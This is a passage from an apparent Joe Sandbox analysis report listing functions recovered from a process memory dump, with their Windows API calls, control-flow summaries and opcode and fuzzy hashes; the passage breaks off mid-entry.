                                          Function 04A83A57 Relevance: .2, Instructions: 240COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1dbca97945e9f8e34871c4c189a1f6d087c5dad7bf6bcda166801c5621709fa9
                                          • Instruction ID: ebe61a9a6fdb12de500e3f1862c588c66fe397dc74d6abc1ca76b2865da5b74f
                                          • Opcode Fuzzy Hash: 1dbca97945e9f8e34871c4c189a1f6d087c5dad7bf6bcda166801c5621709fa9
                                          • Instruction Fuzzy Hash: BFC18AB0C817468BD710DF66E8D818E3B61FB45324BD06B09D1632B6D8D7B824EAEF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A80FC0 Relevance: 6.1, APIs: 4, Instructions: 123threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 04A81030
                                          • GetCurrentThread.KERNEL32 ref: 04A8106D
                                          • GetCurrentProcess.KERNEL32 ref: 04A810AA
                                          • GetCurrentThreadId.KERNEL32 ref: 04A81103
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 365c4f67f2e4b3ae1d269923674cf1f13c10c299ea2d3f078d37eff49c28ac3d
                                          • Instruction ID: b06486c61b7d0816a66d0f603c64bf2f241c98c144798ad196f814bab88d551b
                                          • Opcode Fuzzy Hash: 365c4f67f2e4b3ae1d269923674cf1f13c10c299ea2d3f078d37eff49c28ac3d
                                          • Instruction Fuzzy Hash: 405135B0D002498FEB14CFAAD9887DEBBF1EF88304F24845EE409A7251D735A985CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A80FD0 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 04A81030
                                          • GetCurrentThread.KERNEL32 ref: 04A8106D
                                          • GetCurrentProcess.KERNEL32 ref: 04A810AA
                                          • GetCurrentThreadId.KERNEL32 ref: 04A81103
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 91fcac71796b905f10dda8246a0872698fa8b0f953ded7f3b1cc41ef392dc862
                                          • Instruction ID: 57dcac91a1c770d74ba83a2681d40d1bf624918a4b66bf47d69f0ba57edce6c3
                                          • Opcode Fuzzy Hash: 91fcac71796b905f10dda8246a0872698fa8b0f953ded7f3b1cc41ef392dc862
                                          • Instruction Fuzzy Hash: AC5124B0D002498FEB14CFAADA887DEBBF1EF88314F248459E409A7350D775A985CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A8562C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 103 4a8562c-4a8569e 104 4a856a9-4a856b0 103->104 105 4a856a0-4a856a6 103->105 106 4a856bb-4a856f3 104->106 107 4a856b2-4a856b8 104->107 105->104 108 4a856fb-4a8575a CreateWindowExW 106->108 107->106 109 4a8575c-4a85762 108->109 110 4a85763-4a8579b 108->110 109->110 114 4a857a8 110->114 115 4a8579d-4a857a0 110->115 116 4a857a9 114->116 115->114 116->116
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04A8574A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: feada81a1f1a1fa9d213ad615183f3bca5028c6ebe8462993ca4f3cf50a678fe
                                          • Instruction ID: 79791e69a81520c78ab8530da0aa55c296f17530a7e786da3c624b035ea569f4
                                          • Opcode Fuzzy Hash: feada81a1f1a1fa9d213ad615183f3bca5028c6ebe8462993ca4f3cf50a678fe
                                          • Instruction Fuzzy Hash: 3751C0B1D00309EFDB14DF99C980ADEBBB1FF48310F24852AE815AB210D774A885CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A85638 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 117 4a85638-4a8569e 118 4a856a9-4a856b0 117->118 119 4a856a0-4a856a6 117->119 120 4a856bb-4a8575a CreateWindowExW 118->120 121 4a856b2-4a856b8 118->121 119->118 123 4a8575c-4a85762 120->123 124 4a85763-4a8579b 120->124 121->120 123->124 128 4a857a8 124->128 129 4a8579d-4a857a0 124->129 130 4a857a9 128->130 129->128 130->130
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04A8574A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 3653ca4d1d1375963dabfcc312c594204d4f52a5135a5a512367a361ca3f3b5b
                                          • Instruction ID: 8de48b08a5a9c292137bd00031ffd8a1ca8479c6b21edf621531b624493e89e9
                                          • Opcode Fuzzy Hash: 3653ca4d1d1375963dabfcc312c594204d4f52a5135a5a512367a361ca3f3b5b
                                          • Instruction Fuzzy Hash: E341A0B1D00309EFDB14DF9AC984ADEBBB5FF48310F24852AE819AB210D774A945CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A8464C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 131 4a8464c-4a87c2c 134 4a87cdc-4a87cfc call 4a84524 131->134 135 4a87c32-4a87c37 131->135 143 4a87cff-4a87d0c 134->143 137 4a87c39-4a87c70 135->137 138 4a87c8a-4a87cc2 CallWindowProcW 135->138 144 4a87c79-4a87c88 137->144 145 4a87c72-4a87c78 137->145 139 4a87ccb-4a87cda 138->139 140 4a87cc4-4a87cca 138->140 139->143 140->139 144->143 145->144
                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A87CB1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: CallProcWindow
                                          • String ID:
                                          • API String ID: 2714655100-0
                                          • Opcode ID: c7c8bf6bce62828baaf4fed1a814398de2da271ae9f4019b8976a48db2aca7fa
                                          • Instruction ID: e70bdbc4dfe3c7c91cc5f09cf22faf3a4db38d1cbe0e6f8abc4a7e6f449af00a
                                          • Opcode Fuzzy Hash: c7c8bf6bce62828baaf4fed1a814398de2da271ae9f4019b8976a48db2aca7fa
                                          • Instruction Fuzzy Hash: 2E411AB8A00205CFDB14DF99C988AAEBBF5FF98314F24845DD419AB321D774A841CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02473E08 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 148 2473e08-2475431 CreateActCtxA 151 2475433-2475439 148->151 152 247543a-2475494 148->152 151->152 159 2475496-2475499 152->159 160 24754a3-24754a7 152->160 159->160 161 24754a9-24754b5 160->161 162 24754b8 160->162 161->162 164 24754b9 162->164 164->164
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 02475421
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.414095794.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2470000_535276_86376.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 70c182ca582511b788278df07978a4810ce194fcd1383c9af33046737b394e09
                                          • Instruction ID: 09de913091802e033955c483374b05edf19ba061db30ea5ff7a1a0c8fce29912
                                          • Opcode Fuzzy Hash: 70c182ca582511b788278df07978a4810ce194fcd1383c9af33046737b394e09
                                          • Instruction Fuzzy Hash: E741D071C0061CCEEB24DFA9C9847CEBBB5BF48304F64806AD419BB251DBB56985CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 02475367 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 165 2475367-2475431 CreateActCtxA 167 2475433-2475439 165->167 168 247543a-2475494 165->168 167->168 175 2475496-2475499 168->175 176 24754a3-24754a7 168->176 175->176 177 24754a9-24754b5 176->177 178 24754b8 176->178 177->178 180 24754b9 178->180 180->180
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 02475421
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.414095794.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2470000_535276_86376.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: e7b5f0c21529ad4e277fe77e6d363de7c23178ef2a2980ddfcdc38567396ae3b
                                          • Instruction ID: 187ed46549b8dea33c4abb9ede63f5b7cb5270ef6c9f58c91e023f1b57cc8f46
                                          • Opcode Fuzzy Hash: e7b5f0c21529ad4e277fe77e6d363de7c23178ef2a2980ddfcdc38567396ae3b
                                          • Instruction Fuzzy Hash: D441E271C0021DCEEB24DFA9C9847CEBBB5BF48304F64806AD419BB251DB756986CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A811F0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 181 4a811f0-4a8128c DuplicateHandle 182 4a8128e-4a81294 181->182 183 4a81295-4a812b2 181->183 182->183
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04A8127F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 8e1e731a25b45439e04c250d7c6812c8a78865fb168821b0c40f85d2b77be399
                                          • Instruction ID: 5b718b2ba7654af05bf7f077af55ae951e111b9274b693a10b5987f68981a960
                                          • Opcode Fuzzy Hash: 8e1e731a25b45439e04c250d7c6812c8a78865fb168821b0c40f85d2b77be399
                                          • Instruction Fuzzy Hash: C021F2B5D002499FDB10CFAAD584AEEBFF4EB48320F14846AE814A7210D374A945CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A811F8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 4a811f8-4a8128c DuplicateHandle 187 4a8128e-4a81294 186->187 188 4a81295-4a812b2 186->188 187->188
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04A8127F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 4590606ad3c8a127306f715a007837284c77636dc4d79c5aa7e3b67f31f4cc04
                                          • Instruction ID: c27605976f2f68e4d67a984676f8d9e5aec2d8bf721e80838eaff02b63f3210a
                                          • Opcode Fuzzy Hash: 4590606ad3c8a127306f715a007837284c77636dc4d79c5aa7e3b67f31f4cc04
                                          • Instruction Fuzzy Hash: A321C4B5D002099FDB10CF9AD984ADEBFF4EB48320F14842AE915A7350D374A954DFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0247E6D8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 191 247e6d8-247f0f8 193 247f100-247f12f LoadLibraryExW 191->193 194 247f0fa-247f0fd 191->194 195 247f131-247f137 193->195 196 247f138-247f155 193->196 194->193 195->196
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0247EF11,00000800,00000000,00000000), ref: 0247F122
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.414095794.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2470000_535276_86376.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 2182a655c3a2d8cf7538b5cb44081afca341f3e2188d8699df6fe1661d052b48
                                          • Instruction ID: 368609bd935292da6c5d199a463d8c60ccb274dcfed2b02696e30ce4ebdca052
                                          • Opcode Fuzzy Hash: 2182a655c3a2d8cf7538b5cb44081afca341f3e2188d8699df6fe1661d052b48
                                          • Instruction Fuzzy Hash: B71103B29002098FCB10CF9AC944ADFFBF4EB48324F14842AD825A7600C374A949CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A85878 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 199 4a85878-4a858ea SetWindowLongW 200 4a858ec-4a858f2 199->200 201 4a858f3-4a85907 199->201 200->201
                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 04A858DD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          • Opcode ID: f63bca8d4060d0a66441c3ed6649c594b87ea8998c46336d31c9b482dade0041
                                          • Instruction ID: 2e44b356988ecfed1cd0f8fb1286d36d72025f97942778074d794e4ffac74cd8
                                          • Opcode Fuzzy Hash: f63bca8d4060d0a66441c3ed6649c594b87ea8998c46336d31c9b482dade0041
                                          • Instruction Fuzzy Hash: 0C11F2B6C002499FDB10DF9AD584BDFBBF4EB48320F24845AD955A7640C374A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0247EE30 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 203 247ee30-247ee70 204 247ee72-247ee75 203->204 205 247ee78-247eea3 GetModuleHandleW 203->205 204->205 206 247eea5-247eeab 205->206 207 247eeac-247eec0 205->207 206->207
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0247EE96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.414095794.0000000002470000.00000040.00000800.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2470000_535276_86376.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 9b246e5c299ad95532a1b5ff0a1564808df45a51e439d2c34ac2059d30a4c7f3
                                          • Instruction ID: 4d4e1e23b306d4e61be84076caf9336cb4cfd815cfc4ec80776ef6c252d586db
                                          • Opcode Fuzzy Hash: 9b246e5c299ad95532a1b5ff0a1564808df45a51e439d2c34ac2059d30a4c7f3
                                          • Instruction Fuzzy Hash: FE11DFB6D002498FDB10CF9AC544ADFFBF4AB88224F14896AD429B7610C374A545CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A85880 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 209 4a85880-4a858ea SetWindowLongW 210 4a858ec-4a858f2 209->210 211 4a858f3-4a85907 209->211 210->211
                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 04A858DD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          • Opcode ID: c60ccff0e87baa7ae985a164143662faabe796a679cf57a7c29e89c856e5470e
                                          • Instruction ID: 6848c9361318930a2199588cb486ef431346773f6f77b1ae3fafaeb5ef0760ce
                                          • Opcode Fuzzy Hash: c60ccff0e87baa7ae985a164143662faabe796a679cf57a7c29e89c856e5470e
                                          • Instruction Fuzzy Hash: 0D11D0B5C002099FDB10DF9AD584BDFBBF8EB48324F24845AD855A7600C374A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074D53C Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411621617.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_74d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 700e719beb00746564d8fdbda5c9533a4f03070ac69604297861d6a7881f1397
                                          • Instruction ID: 27cff6bfd4c650d9350bd47e85821a6d7e744419535f0e54297fd172742d0149
                                          • Opcode Fuzzy Hash: 700e719beb00746564d8fdbda5c9533a4f03070ac69604297861d6a7881f1397
                                          • Instruction Fuzzy Hash: FD216AB1504240DFCB11DF04D8C0B16FF61FB98324F208669E8850B246C73ADC66D7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074D450 Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411621617.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_74d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd8658743c560265446d3fa5b26394bc38bf30248357ce28b10adb63077565dd
                                          • Instruction ID: e2fb0d146cfc3060539f673c128ed4ad924cfbb2e99cdb1b6dc49903fc0efa82
                                          • Opcode Fuzzy Hash: bd8658743c560265446d3fa5b26394bc38bf30248357ce28b10adb63077565dd
                                          • Instruction Fuzzy Hash: DE2128B1504280DFDB25DF18D9C0B27BF65FB88324F248569DC854B246C73AEC56DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0075D1D4 Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411871537.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_75d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d5f6d27906dac3e0566fe234bb752c7adee1e0239bea91cfd026baa98ced3ee
                                          • Instruction ID: f38c8e8ce653125159653120938fa80d3d1dcb2530161179087c89ed89a3f196
                                          • Opcode Fuzzy Hash: 3d5f6d27906dac3e0566fe234bb752c7adee1e0239bea91cfd026baa98ced3ee
                                          • Instruction Fuzzy Hash: B1212571504240EFDB21CF14D5C0B56BBA1FB84325F20CA6DDC494B242C7BADC4ADA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0075D0EC Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411871537.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_75d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf33d2ab0c6bd2622b2a42ff61d086c30111b88f9ded660783ca89060ca0b580
                                          • Instruction ID: c89fd07394251ec267ff7957069e5cd4928f4519d6f6ed60e1b4cfbfdfaf4755
                                          • Opcode Fuzzy Hash: bf33d2ab0c6bd2622b2a42ff61d086c30111b88f9ded660783ca89060ca0b580
                                          • Instruction Fuzzy Hash: 522137B1504648EFDB20DF14D8C0B56BB61FB84315F20C969DC0A4B346C7BADC4ADBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074D537 Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411621617.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_74d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                          • Instruction ID: 96b41cce97548c3cbe46fa7add3cb17033997849a90a900ab895b8058f727874
                                          • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                          • Instruction Fuzzy Hash: C411B176504280CFCB16CF10D5C4B16BF72FB98324F24C6A9D8494B616C33AD866CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074D44B Relevance: .1, Instructions: 56COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411621617.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_74d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                          • Instruction ID: b0898a92928350214d095cb70f1fbab0827c154fcb6cae7da74225a6b83adca2
                                          • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                          • Instruction Fuzzy Hash: AB11BE76504280CFDB16CF14D9C4B16FF71FB88324F2886A9D8454B616C33AD86ACBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0075D0E7 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411871537.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_75d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                          • Instruction ID: b6bc4abc3479bb936d5ad099a11affe3194440f130c08b799c6f22f9e81ecc79
                                          • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                          • Instruction Fuzzy Hash: A8110D75504684CFDB21CF10C9C0B15BBB2FB84324F28C6ADDC094B656C37AD80ACBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0075D1CF Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411871537.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_75d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                          • Instruction ID: 70c0410095e3ac8c9e6a7b624240b8484742b0e4dcbc72cbfbb30de2380e1fc2
                                          • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                          • Instruction Fuzzy Hash: 3C11BB75904280DFDB22CF10C5C0B55BBA1FB84324F28C6ADDC494B656C37AD84ACB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074D745 Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411621617.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_74d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 450260e8fd2b42d3adda09f2bf4ac33b425f82e5bbc3b1280ba7142d6707868c
                                          • Instruction ID: 23a233f2e88fcb17f47aec32cb5bd1485692329c06f3230b761f15d949d37417
                                          • Opcode Fuzzy Hash: 450260e8fd2b42d3adda09f2bf4ac33b425f82e5bbc3b1280ba7142d6707868c
                                          • Instruction Fuzzy Hash: 6A01F7315083849AE7324E29CC84B66BF98EF41734F18855AED851F242C37C9C40D6B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0074D744 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.411621617.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_74d000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 778c877a2de1465630b82e1d962fb0b5d8075bbacf319964cdef68f7d77c06e6
                                          • Instruction ID: 51e86330bd2a1bce268cac9b634fe59f7ccc81abcf6907af6e913dd700c7f25a
                                          • Opcode Fuzzy Hash: 778c877a2de1465630b82e1d962fb0b5d8075bbacf319964cdef68f7d77c06e6
                                          • Instruction Fuzzy Hash: 68F062715042849EE7218E19CC88B62FF98EB91734F18C55AED485F386C3799C44CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 04A83AB0 Relevance: .3, Instructions: 315COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 43dac83ed35b0a060e9dfc99adb1189fd167c291cbb09d080d10af405d9209e1
                                          • Instruction ID: 491b6f37f949b27ba1435988573b0da64b270fed6b1966422a9783444538ebaa
                                          • Opcode Fuzzy Hash: 43dac83ed35b0a060e9dfc99adb1189fd167c291cbb09d080d10af405d9209e1
                                          • Instruction Fuzzy Hash: E912E7F1C817468BD710DF66E8D818E3B60B744328BD06A09D2631BAD9D7B815EEEF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04A81B44 Relevance: .3, Instructions: 265COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.426448705.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4a80000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
